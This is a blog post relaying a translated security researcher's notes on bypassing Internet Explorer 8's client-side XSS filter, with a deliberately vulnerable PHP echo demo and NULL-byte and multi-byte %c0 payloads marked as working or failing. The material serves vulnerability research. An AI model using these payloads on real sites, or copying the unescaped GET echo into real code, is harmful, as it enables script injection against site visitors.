Home arrow Blog arrow Bypassing IE 8's Client-Side Cross-Site Script (XSS) Filters
Bypassing IE 8's Client-Side Cross-Site Script (XSS) Filters
Written by Angelo Castigliola   
Oct 19, 2012 at 04:34 PM

An interesting paper, by a Chinese hacker Pujun Li, translated by Insight-labs, on bypassing IE 8’s client-side Cross-Site Scripting (XSS) filters:

Basically some special characters in the web container to do the conversion process, if developers mistake concept in the process, it might be bypass IE XSS Filter.

In PHP, if website enable magic_quote_gpc = On in php.ini , as we known ‘(single-quote), “ (double quote), \ (backslash) and NULL characters are backslash as an escape (%00 => \0).

For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( \ ) escape character, I mean they aren’t depthly understanding of the conversion process.

1. xss.php demo source code:

<?php echo $_GET['x']?>

<script type="text/javascript">

var x="<?php echo $_GET['z']?>"



2. HTML bypass case:

<script>alert(1)</script> :(


%00%00v%00%00<script>alert(1)</script> :(

<script/%00%00v%00%00>alert(1)</script> :D




1. bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept <script> also can be <script [here]>.


3. Javascript bypass case:


%c0″;alert(%00)// :)

%c0″;//(%0dalert(1)// :(

%c0″;//(%0dalert(1)// :(





1.Need through multi-byte problem close a backslash ( \ )

2. //(%000000%0d is used to bypass the function intercept rules.

Feel free to contact me with @jackmasa

User Comments

Comment by Kaylan on 2012-11-23 13:18:44
If you wrote an article about life we'd all reach enlightenemnt.
Your Name / Email Address
Security Check. Please enter this code Listen to code

Last Updated ( Oct 21, 2012 at 06:41 AM )
Angelo Castigliola     View Photos of Angelo (8)
    Send Angelo a Message
Sec and Sec-Tech Newsletter

Upcoming Events